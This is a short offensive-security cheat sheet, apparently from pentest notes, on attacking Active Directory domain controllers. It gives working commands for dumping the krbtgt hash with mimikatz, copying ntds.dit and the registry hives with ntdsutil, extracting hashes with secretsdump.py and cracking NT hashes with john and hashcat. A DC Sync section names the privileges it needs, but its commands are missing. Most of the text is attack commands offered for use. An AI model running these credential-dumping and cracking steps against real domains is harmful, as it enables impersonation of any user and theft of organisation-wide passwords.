Domain Controller specific
TGT Dump
dump the hash used by the domain controller to sign Kerberos tickets. This allows an attacker to create custom tickets and impersonate other users or gain access to different services/hosts
lsadump::dcsync /user:krbtgt
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgtNTDS Dump
NTDS is an encrypted database containing information about the structure and elements of the AD.
In order to dump the stored hashes we need to extract the following files.
C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITYTo dump the required files use the following command in PowerShell
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full <dump folder>' q q"Extract the hashes
secretsdump.py -security <security file> -system <system file> -ntds <path to ntds.dit> LOCALCrack the hashes. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure AAAA:BBBB the actual string to bruteforce is the one to the right of the column
john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hash> <wordlist> #rows follow the format <user>:<hash>DC Sync
To execute this attack we need to operate under a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. By default Local and Domain Administrators own these privileges.
Find users with the required privileges with PowerView
If the current user lacks the required permissions run this command on the DC to add them.
Run on DC
Run remotely
Last updated